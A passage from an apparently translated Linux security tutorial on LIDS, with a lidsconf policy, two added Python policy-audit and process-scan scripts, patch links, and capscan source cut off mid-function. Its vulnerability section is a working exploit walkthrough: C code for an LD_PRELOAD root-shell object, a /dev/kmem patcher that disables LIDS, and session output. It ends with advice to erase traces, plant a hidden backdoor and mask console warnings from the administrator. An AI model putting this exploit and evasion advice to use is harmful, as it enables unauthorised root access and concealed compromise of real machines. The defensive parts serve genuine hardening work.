/sbin/lidsconf -A -s /bin/login -o CAP_FSETID -j GRANT<p>
# Protect the boot partition<br>
/sbin/lidsconf -A -o /boot -j READONLY<p>
# Protect root's home dir, but allow bash history<br>
/sbin/lidsconf -A -o /root -j READONLY<br>
/sbin/lidsconf -A -s /bin/bash -o /root/.bash_history -j WRITE<p>
# Protect system logs<br>
/sbin/lidsconf -A -o /var/log -j APPEND<br>
/sbin/lidsconf -A -o /var/log/dmesg -j WRITE<br>
/sbin/lidsconf -A -s /bin/login -o /var/log/wtmp -j WRITE<br>
/sbin/lidsconf -A -s /bin/login -o /var/log/lastlog -j WRITE<br>
/sbin/lidsconf -A -s /sbin/init -o /var/log/wtmp -j WRITE<br>
/sbin/lidsconf -A -s /sbin/init -o /var/log/lastlog -j WRITE<br>
/sbin/lidsconf -A -s /sbin/halt -o /var/log/wtmp -j WRITE<br>
/sbin/lidsconf -A -s /sbin/halt -o /var/log/lastlog -j WRITE<br>
/sbin/lidsconf -A -s /etc/rc.d/rc.sysinit -o /var/log/wtmp -i 1 -j WRITE<br>
/sbin/lidsconf -A -s /etc/rc.d/rc.sysinit -o /var/log/lastlog -i 1 -j WRITE<p>
# Shutdown<br>
/sbin/lidsconf -A -s /sbin/init -o CAP_INIT_KILL -j GRANT<br>
/sbin/lidsconf -A -s /sbin/init -o CAP_KILL -j GRANT<br>
# Give the following init script the proper privileges to kill processes and<br>
# unmount the file systems. However, anyone who can execute these scripts<br>
# by themselves can effectively kill your processes. It's better than<br>
# the alternative, however.<br>
/sbin/lidsconf -A -s /etc/rc.d/init.d/halt -o CAP_INIT_KILL -i 1 -j GRANT<br>
/sbin/lidsconf -A -s /etc/rc.d/init.d/halt -o CAP_KILL -i 1 -j GRANT<br>
/sbin/lidsconf -A -s /etc/rc.d/init.d/halt -o CAP_NET_ADMIN -i 1 -j GRANT<br>
/sbin/lidsconf -A -s /etc/rc.d/init.d/halt -o CAP_SYS_ADMIN -i 1 -j GRANT<br>
/sbin/lidsconf -A -s /etc/rc.d/init.d/halt -o CAP_SYS_RAWIO -i 1 -j GRANT<p>
# Other<br>
/sbin/lidsconf -A -s /sbin/update -o CAP_SYS_ADMIN -j GRANT<br>
/sbin/lidsconf -A -s /sbin/consoletype -o CAP_SYS_ADMIN -j GRANT<p>
#Protect and hide Httpd<br>
/sbin/lidsconf -A -o /etc/httpd -j DENY<br>
/sbin/lidsconf -A -s /usr/sbin/httpd -o /etc/httpd -j READONLY<br>
/sbin/lidsconf -A -s /usr/sbin/httpd -o CAP_HIDDEN -j GRANT<br>
---------------------------------------------------------------------------------<br>
&nbsp;&nbsp;&nbsp; Run /sbin/lidsadm -S -- -LIDS to switch LIDS into the unprotected state, then execute the configuration script; run /sbin/lidsadm -S -- +RELOAD_CONF to reload the LIDS configuration; finally run lidsadm -S -- +LIDS to switch back into the protected state.<br>
&nbsp;&nbsp;&nbsp; Test the files, directories and processes that LIDS protects with commands such as ls /etc/shadow, ls /etc/lids, touch /sbin/x and ps ax|grep http; test LIDS's detection and response functions by running a scanner against the machine. The best approach is to imitate what an intruder does after a successful break-in, such as installing a rootkit, and check that LIDS's main functions hold up.<p>
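As an added example, not part of the original article, the following Python script audits a lidsconf policy of the kind shown above before it is loaded: it parses the `lidsconf -A` lines and flags the capability grants a reviewer should look at twice, namely inheritable grants (`-i`) to scripts such as the halt script that the comments above already warn about, subject-less grants, and grants of CAP_SYS_RAWIO or CAP_SYS_MODULE, which the vulnerability test later on this page shows are enough to switch LIDS off. The embedded sample policy is a constructed subset of the script above, and the severity labels are this script's own.<p>

```python
import shlex

# Capabilities the article singles out: with either of these a process can
# disable LIDS (CAP_SYS_RAWIO permits writes to /dev/kmem, CAP_SYS_MODULE
# loads code into the kernel).
LIDS_DISABLING_CAPS = {"CAP_SYS_RAWIO", "CAP_SYS_MODULE"}

# Constructed sample policy: a subset of the lidsconf script quoted above.
SAMPLE_POLICY = """\
/sbin/lidsconf -A -s /bin/login -o CAP_FSETID -j GRANT
# Protect the boot partition
/sbin/lidsconf -A -o /boot -j READONLY
/sbin/lidsconf -A -o /var/log -j APPEND
/sbin/lidsconf -A -s /sbin/init -o CAP_KILL -j GRANT
/sbin/lidsconf -A -s /etc/rc.d/init.d/halt -o CAP_SYS_ADMIN -i 1 -j GRANT
/sbin/lidsconf -A -s /etc/rc.d/init.d/halt -o CAP_SYS_RAWIO -i 1 -j GRANT
/sbin/lidsconf -A -o /etc/httpd -j DENY
/sbin/lidsconf -A -s /usr/sbin/httpd -o CAP_HIDDEN -j GRANT
"""


def parse_rule(line):
    """Parse one `lidsconf -A` line into a dict; None for blanks, comments, other commands."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    argv = shlex.split(line)
    if len(argv) < 2 or not argv[0].endswith("lidsconf") or argv[1] != "-A":
        return None
    rule = {"subject": None, "object": None, "inherit": 0, "target": None}
    flags = {"-s": "subject", "-o": "object", "-j": "target"}
    i = 2
    while i + 1 < len(argv):
        opt, val = argv[i], argv[i + 1]
        if opt in flags:
            rule[flags[opt]] = val
        elif opt == "-i":
            rule["inherit"] = int(val)  # inheritance depth for child processes
        i += 2
    if rule["object"] is None or rule["target"] is None:
        return None
    return rule


def parse_policy(text):
    """Return [(lineno, rule)] for every ACL line in a lidsconf script."""
    rules = []
    for lineno, line in enumerate(text.splitlines(), 1):
        rule = parse_rule(line)
        if rule is not None:
            rules.append((lineno, rule))
    return rules


def protected_objects(text):
    """Map each path object that has a subject-less (default) rule to its target."""
    return {r["object"]: r["target"] for _, r in parse_policy(text)
            if r["subject"] is None and not r["object"].startswith("CAP_")}


def audit(text):
    """Return (lineno, severity, message) for capability grants worth review."""
    findings = []
    for lineno, r in parse_policy(text):
        if not r["object"].startswith("CAP_") or r["target"] != "GRANT":
            continue
        cap, subj = r["object"], r["subject"] or "<every process>"
        if cap in LIDS_DISABLING_CAPS:
            findings.append((lineno, "CRITICAL",
                             f"{cap} granted to {subj}: sufficient to switch LIDS off"))
        if r["inherit"] > 0:
            findings.append((lineno, "HIGH",
                             f"{cap} on {subj} is inheritable (-i {r['inherit']}): "
                             "every child it spawns keeps it"))
        if r["subject"] is None:
            findings.append((lineno, "HIGH", f"{cap} granted without a subject"))
    return findings


if __name__ == "__main__":
    for lineno, sev, msg in audit(SAMPLE_POLICY):
        print(f"line {lineno}: {sev}: {msg}")
```

Run it against the full script above (read the file into `audit()`) and the two `-i 1` grants on /etc/rc.d/init.d/halt come out as the highest-severity items, which is exactly the trade-off the script's own comment acknowledges.<p>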



<center><A HREF="#Content">[Contents]</A></center>
<hr><br><A NAME="I729" ID="I729"></A><center><b><font size=+2>Vulnerability Test</font></b></center><br>

2. Vulnerability test:<br>
&nbsp;&nbsp;&nbsp; Through LD_PRELOAD, a shared object can inject arbitrary code into a program to which LIDS has granted capabilities, so an intruder inherits the privileges and file access that the LIDS configuration gives that program; if the grant includes CAP_SYS_RAWIO or CAP_SYS_MODULE, the intruder can shut LIDS down and gain access to every file. Under some configurations this also yields root privileges.<p>
The test program can be downloaded from:<br>
http://www.lids.org/download/test-lids.sh<br>
http://www.lids.org/download/test-lids.sh.asc<p>
&nbsp;&nbsp;&nbsp; Now let us break into a Linux system with LIDS installed; naturally, this LIDS is the buggy version.<br>
&nbsp;&nbsp;&nbsp; First obtain an ordinary account, through finger, sendmail or social engineering; that should not be hard for anyone. Any account will do, as long as it allows remote login; local login is even better!<p>
[test@rh72 test]$ls /proc/sys<br>
abi debug dev fs kernel lids net proc<br>
[test@rh72 test]$ls /sbin/lids*<br>
/sbin/lidsadm /sbin/lidsconf<br>
--So this system has LIDS installed<p>
[test@rh72 test]$vi testlids.sh<br>
---------------------------------------------------------------------------------<br>
#!/bin/sh<p>
# Creates /tmp/boom.so you might<br>
# use to let LIDS leak capabilities<br>
# to your shell.<p>
cat&gt;/tmp/boom.c&lt;&lt;_EOF_;<br>
#include &lt;stdio.h&gt;<br>
#include &lt;unistd.h&gt;<br>
#include &lt;fcntl.h&gt;<p>
_init()<br>
{<br>
char *a[] = {&quot;/bin/bash&quot;, NULL};<br>
setuid(0);<br>
close(0);close(1);close(2);<br>
open(&quot;/dev/tty&quot;, O_RDWR);<br>
dup(0);<br>
dup(1);<br>
execve(*a,a,NULL);<br>
return -1;<br>
}<p>
_EOF_<p>
cc -c -fPIC /tmp/boom.c -o /tmp/boom.o<br>
ld -Bshareable /tmp/boom.o -o /tmp/boom.so<br>
echo &quot;OK&quot;;<br>
---------------------------------------------------------------------------------<br>
[test@rh72 test]$ chmod +x testlids.sh<br>
[test@rh72 test]$ ./testlids.sh<br>
OK<br>
[test@fire lids]$ LD_PRELOAD=/tmp/boom.so /bin/login<br>
[root@fire lids]# whoami<br>
root<br>
&nbsp;&nbsp;&nbsp; Wow, root this easily, easier than on a Linux without LIDS, great! :)<br>
So an ordinary user can obtain superuser privileges directly through LD_PRELOAD on a system running a buggy LIDS; administrators who install LIDS must take care to keep it upgraded and correctly configured.<p>
(Root privileges are obtained directly through /bin/login because the following LIDS configuration commands were used:<br>
/sbin/lidsconf -A -s /bin/login -o CAP_SETUID -j GRANT<br>
/sbin/lidsconf -A -s /bin/login -o CAP_SETGID -j GRANT<br>
/sbin/lidsconf -A -s /bin/login -o CAP_CHOWN -j GRANT<br>
/sbin/lidsconf -A -s /bin/login -o CAP_FSETID -j GRANT )<p>
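The transcript above shows the two facts a defender wants to catch on a live machine: a process carrying capabilities LIDS handed to /bin/login or the halt script, and an LD_PRELOAD pointing at an object in /tmp. As an added example, not part of the original article or of the capscan tool it attaches, the following Python script reads the same information the kernel reports in /proc/&lt;pid&gt;/status (the CapEff mask, decoded with the bit numbers from linux/capability.h, which match the numbers capscan prints below) and /proc/&lt;pid&gt;/environ, and flags the combination. The sample status and environ blobs are constructed to mirror the shell obtained above; the trusted-directory list and severity labels are this script's own assumptions.<p>

```python
import os

# Capability bit numbers from linux/capability.h; CAP_KILL = 5,
# CAP_NET_ADMIN = 12, CAP_SYS_RAWIO = 17, CAP_SYS_ADMIN = 21 and
# CAP_MKNOD = 27 are the values capscan prints in the transcript.
CAP_NAMES = [
    "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_DAC_READ_SEARCH", "CAP_FOWNER",
    "CAP_FSETID", "CAP_KILL", "CAP_SETGID", "CAP_SETUID", "CAP_SETPCAP",
    "CAP_LINUX_IMMUTABLE", "CAP_NET_BIND_SERVICE", "CAP_NET_BROADCAST",
    "CAP_NET_ADMIN", "CAP_NET_RAW", "CAP_IPC_LOCK", "CAP_IPC_OWNER",
    "CAP_SYS_MODULE", "CAP_SYS_RAWIO", "CAP_SYS_CHROOT", "CAP_SYS_PTRACE",
    "CAP_SYS_PACCT", "CAP_SYS_ADMIN", "CAP_SYS_BOOT", "CAP_SYS_NICE",
    "CAP_SYS_RESOURCE", "CAP_SYS_TIME", "CAP_SYS_TTY_CONFIG", "CAP_MKNOD",
    "CAP_LEASE", "CAP_AUDIT_WRITE", "CAP_AUDIT_CONTROL", "CAP_SETFCAP",
    "CAP_MAC_OVERRIDE", "CAP_MAC_ADMIN", "CAP_SYSLOG", "CAP_WAKE_ALARM",
    "CAP_BLOCK_SUSPEND", "CAP_AUDIT_READ", "CAP_PERFMON", "CAP_BPF",
    "CAP_CHECKPOINT_RESTORE",
]

# Capabilities the article says are enough to switch LIDS off.
LIDS_DISABLING_CAPS = {"CAP_SYS_RAWIO", "CAP_SYS_MODULE"}

# Assumed set of directories a legitimate preload object would live in;
# a preload from anywhere else in a privileged process is suspicious.
TRUSTED_LIB_DIRS = ("/lib/", "/lib64/", "/usr/lib/", "/usr/lib64/")

# Constructed sample mirroring the shell in the transcript: uid 0 with
# CapEff bits 5, 12, 17, 21 and 27 set, and LD_PRELOAD pointing at /tmp.
SAMPLE_STATUS = "Name:\tbash\nPid:\t630\nUid:\t0\t0\t0\t0\nCapEff:\t0000000008221020\n"
SAMPLE_ENVIRON = b"HOME=/root\x00LD_PRELOAD=/tmp/boom.so\x00PATH=/bin:/usr/bin\x00"


def decode_caps(mask_hex):
    """Turn a CapEff hex mask into the list of capability names that are set."""
    mask = int(mask_hex, 16)
    return [name for bit, name in enumerate(CAP_NAMES) if mask >> bit & 1]


def parse_status(text):
    """Pick Name, real Uid and the decoded CapEff out of /proc/<pid>/status text."""
    fields = {}
    for line in text.splitlines():
        key, _, value = line.partition(":")
        fields[key] = value.strip()
    return {"name": fields.get("Name", "?"),
            "uid": int(fields["Uid"].split()[0]) if "Uid" in fields else -1,
            "caps": decode_caps(fields.get("CapEff", "0"))}


def preload_from_environ(raw):
    """Return the LD_PRELOAD value from a NUL-separated environ blob, or None."""
    for entry in raw.split(b"\x00"):
        if entry.startswith(b"LD_PRELOAD="):
            return entry[len(b"LD_PRELOAD="):].decode(errors="replace")
    return None


def assess(status_text, environ_raw):
    """Findings for one process: untrusted preload, LIDS-disabling caps, or both."""
    info = parse_status(status_text)
    preload = preload_from_environ(environ_raw)
    untrusted = bool(preload) and not preload.startswith(TRUSTED_LIB_DIRS)
    killers = sorted(set(info["caps"]) & LIDS_DISABLING_CAPS)
    findings = []
    if untrusted:
        findings.append(("HIGH", f"LD_PRELOAD={preload} outside trusted library dirs"))
    if killers:
        findings.append(("CRITICAL", f"effective {', '.join(killers)}: can disable LIDS"))
    if untrusted and killers:
        findings.append(("CRITICAL", f"{info['name']} (uid {info['uid']}) holds "
                         "LIDS-disabling capabilities while running a user-supplied preload"))
    return findings


def scan_proc():
    """Walk /proc on a live system; reading other users' environ needs root."""
    report = {}
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            with open(f"/proc/{pid}/status") as f:
                status = f.read()
            with open(f"/proc/{pid}/environ", "rb") as f:
                environ = f.read()
        except OSError:
            continue  # process exited or not readable by us
        findings = assess(status, environ)
        if findings:
            report[int(pid)] = findings
    return report


if __name__ == "__main__":
    for pid, findings in sorted(scan_proc().items()):
        for sev, msg in findings:
            print(f"pid {pid}: {sev}: {msg}")
```

Reading CapEff is also the non-destructive counterpart of capscan's brute-force probing: capscan learns a capability is present by attempting the privileged operation, whereas this reads the mask the kernel already maintains, so it can be run from a cron job or a monitoring agent without side effects.<p>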
[root@fire lids]# ./capscan -b (capscan probes which capabilities LIDS restricts)<br>
b 5 CAP_KILL<br>
[root@fire lids]# touch /sbin/xlids<br>
touch: /sbin/xlids: Operation not permitted<br>
[root@fire lids]#LD_PRELOAD=/tmp/boom.so /etc/rc.d/init.d/halt<br>
[root@fire lids]# ./capscan -b<br>
b 5 CAP_KILL<br>
b 12 CAP_NET_ADMIN<br>
b 17 CAP_SYS_RAWIO<br>
b 21 CAP_SYS_ADMIN<br>
b 27 CAP_MKNOD<br>
--So we have obtained the CAP_NET_ADMIN, CAP_SYS_RAWIO and CAP_SYS_ADMIN capabilities from the halt script<br>
[root@fire lids]# touch /sbin/xlids<br>
touch: /sbin/xlids: Operation not permitted<br>
[root@fire lids]# ls -al /etc/lids<br>
ls: /etc/lids: No such file or directory<br>
[root@fire lids]# /sbin/lidsconf -L<br>
LIST<br>
LIDS: lidsconf(dev 3:1 inode 150018) pid 630 ppid 581 uid/gid (0/0) on (vc/1):<br>
access hidden file /etc/lids/lids.conf<br>
lidsconf:cannot open /etc/lids/lids.conf<br>
reason: No such file or directory<br>
--LIDS is still active and protects /sbin and /etc/lids: /sbin is read-only, /etc/lids is access-denied<br>
[root@fire lids]#vi lidsoff.c<br>
---------------------------------------------------------------------------------<br>
#lidsoff.c: //mainly sets the kernel variable lids_load to 0<p>
/* Simple and stupid kmem patcher for LIDS.<br>
* Licensed under the GPL. :-)<br>
*/<br>
#include &lt;stdio.h&gt;<br>
#include &lt;unistd.h&gt;<br>
#include &lt;fcntl.h&gt;<br>
#include &lt;errno.h&gt;<br>
#include &lt;stdlib.h&gt;<p>
void die(const char *s)<br>
{<br>
perror(s);<br>
exit(errno);<br>
}<p>
<br>
int main(int argc, char **argv)<br>
{<p>
char zero;<br>
off_t off;<br>
int kmem;<p>
if (argc &lt; 2) {<br>
printf(&quot;Usage: %s &lt;addr-of-lids_local_on-in-hex&gt;\n\n&quot;, *argv);<br>
return 1;<br>
}<p>
kmem = open(&quot;/dev/kmem&quot;, O_RDWR);<br>
if (kmem &lt; 0)<br>
die(&quot;open&quot;);<p>
off = strtoul(argv[1], 0, 16);<br>
printf(&quot;# Patching [%x]\n&quot;, off-4);<p>
lseek(kmem, off-4, SEEK_SET);<br>
read(kmem, &amp;zero, sizeof(zero));<br>
printf(&quot;%d -&gt; 0\n&quot;, zero);<p>
lseek(kmem, off-4, SEEK_SET);<br>
zero = 0;<br>
write(kmem, &amp;zero, sizeof(zero));<br>
close(kmem);<br>
return 0;<br>
}<br>
---------------------------------------------------------------------------------<br>
[root@fire lids]# gcc -o lidsoff lidsoff.c<br>
[root@fire lids]# grep lids /proc/ksyms<br>
c0113868 lids_send_message_Rsmp_ccaa3a65<br>
c029af60 lids_load_Rsmp_a57ab5ad<br>
c029af64 lids_local_on_Rsmp_641824fe<br>
c029af6c lids_local_pid_Rsmp_2a2dd337<br>
c0129270 lids_local_off_Rsmp_445f75c1<br>
[root@fire lids]# ./lidsoff<br>
Usage: ./lidsoff &lt;addr-of-lids_local_on-in-hex&gt;<br>
[root@fire lids]# ./lidsoff c029af64<br>
# Patching [c029af60]<br>
1 -&gt; 0<br>
Ha ha, LIDS has been switched off and is no longer in effect!<br>
[root@fire lids]# ls /etc/lids/lids.conf<br>
/etc/lids/lids.conf<br>
[root@fire lids]# touch /sbin/xlids<p>
&nbsp;&nbsp;&nbsp; At this point the LIDS-protected Linux system is completely under control; easy, isn't it? Finally, don't forget to wipe your footprints and install a backdoor. LIDS itself can be used to hide the backdoor's directory and processes, so even a rootkit is unnecessary. When finished, switch LIDS's state back, or the administrator will easily notice the intrusion. Some warnings may still appear on the victim machine's console, however; it is best to reboot or overwrite them with scanner output! :)<br>



<center><A HREF="#Content">[Contents]</A></center>
<hr><br><A NAME="I727" ID="I727"></A><center><b><font size=+2>Appendix</font></b></center><br>
LIDS fix:<p>
For 2.4 users:<br>
http://www.lids.org/download/lids-1.1.1pre2-2.4.16.tar.gz<br>
http://www.lids.org/download/lids-1.1.1pre2-2.4.16.tar.gz.asc<br>
(or a version later than lids-1.1.1pre2)<p>
For 2.2 users:<br>
http://www.lids.org/download/LIDS-security-patch-0.10.1-2.2.20.diff.gz<br>
http://www.lids.org/download/LIDS-security-patch-0.10.1-2.2.20.diff.gz.asc<br>
(or a version later than lids-0.11.0)<p>
Attached: capscan source code:<br>
--------------[ stealth &lt;stealth@segfault.net&gt; ]--------------------------------<br>
#cap.h<br>
---------------------------------------------------------------------------------<br>
#ifndef __cap_h__<br>
#define __cap_h__<p>
#include &lt;linux/capability.h&gt;<p>
typedef struct __user_cap_header_struct cap_user_header;<br>
typedef struct __user_cap_data_struct cap_user_data;<p>
int capget(cap_user_header_t,cap_user_data_t);<br>
int capset(cap_user_header_t,cap_user_data_t);<br>
int print_cap(cap_user_data_t, cap_user_data_t);<p>
int brute_caps();<p>
#endif<br>
---------------------------------------------------------------------------------<br>
# cap.c<br>
---------------------------------------------------------------------------------<br>
#include &lt;stdio.h&gt;<br>
#include &lt;string.h&gt;<br>
#include &lt;unistd.h&gt;<br>
#include &lt;fcntl.h&gt;<br>
#include &lt;stdlib.h&gt;<br>
#include &lt;sys/types.h&gt;<br>
#include &lt;sys/socket.h&gt;<br>
#include &lt;netinet/in.h&gt;<br>
#include &lt;signal.h&gt;<br>
#include &lt;sys/ioctl.h&gt;<br>
#include &lt;net/if.h&gt;<br>
#include &lt;linux/module.h&gt;<br>
#include &lt;errno.h&gt;<br>
#include &lt;sys/ptrace.h&gt;<br>
#include &lt;sys/stat.h&gt;<br>
#include &quot;cap.h&quot;<p>
extern int wait(int *);<p>
int try_chown()<br>
{<br>
char p[] = &quot;/tmp/fooXXXXXX&quot;;<br>
int r, fd = mkstemp(p);<br>
if (fd &lt; 0)<br>
return 0;<br>
close(fd);<p>
/* try a give-away */<br>
if (chown(p, getuid()+1, getgid()+1) &lt; 0)<br>
r = 0;<br>
else<br>
r = 1;<p>
unlink(p);<br>
return r;<br>
}<p>
<br>
int try_setuid()<br>
{<br>
int euid = geteuid();<p>
if (seteuid(euid + 1) &lt; 0)<br>
return 0;<p>
seteuid(euid);<br>
return 1;<br>
}<p>
<br>
int try_setgid()<br>
{<br>
int egid = getegid();<p>
if (setegid(egid + 1) &lt; 0)<br>
return 0;<p>
setegid(egid);<br>
return 1;<br>
}<p>
<br>
int try_kill()<br>
